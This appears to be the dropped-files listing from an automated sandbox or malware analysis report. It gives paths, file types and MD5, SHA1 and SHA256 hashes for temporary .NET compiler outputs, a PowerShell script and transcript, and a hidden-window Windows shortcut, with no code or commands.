C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	61F20EEB83A2DF00A0E1C0D4368354EA	98B857458DF3E06C218FCFBC853AD767C74D7B8A	9615118FD447D54C43293290C468D10221942E7E810F17F49480F7734D98AAC0
C:\Users\user\AppData\Local\Temp\hscan34n.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	5CC9D50B6760682611B3001F799005E1	F520D61EF463854F7E3B91BEB55892F679D37891	FA2213FE59474D70AD43F883D3B9A1F3BA16DE02ABE723CC01D55527EC05BD36
C:\Users\user\AppData\Local\Temp\hscan34n.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	EAFAD10C6DD69F7BA9B9D2089259EC62	F0BC0816BD99DDA9C30AC968D4889F5D18F5D64D	8BDEE52DE988618605086BBBC39BAE6D0D036D32C78046E6E4088EE50566D945
C:\Users\user\DeviceFile.ps1	ASCII text, with no line terminators	7DD27CE4C0B3B5F7177B2FB71F66BC9B	C3D34E4179FE53C6EBFCBC80F81055A86B6DCD6B	AF793E7055850DFD1B498482A5D7281BB71CAC42493B6A1563A2D99650B6A4D0
C:\Users\user\Documents\20220112\PowerShell_transcript.768287.AFX4atZf.20220112130217.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	BFA122D2010C9F247C467465FEEB48A3	45E447C7FE361ED90E3A65936B89164815A183CA	5C163C94489717F2AA3DA74CB3986D6199865C779BCC72977507BEE575BE9F6E
C:\Users\user\SettingsDocument.lnk	MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized	CA1C201059C5BFD5900F5EB2466883CC	BF3670A8C06A4FABC5C410F368E178B353F9166C	E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	D796BA3AE0C072AA0E189083C7E8C308	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E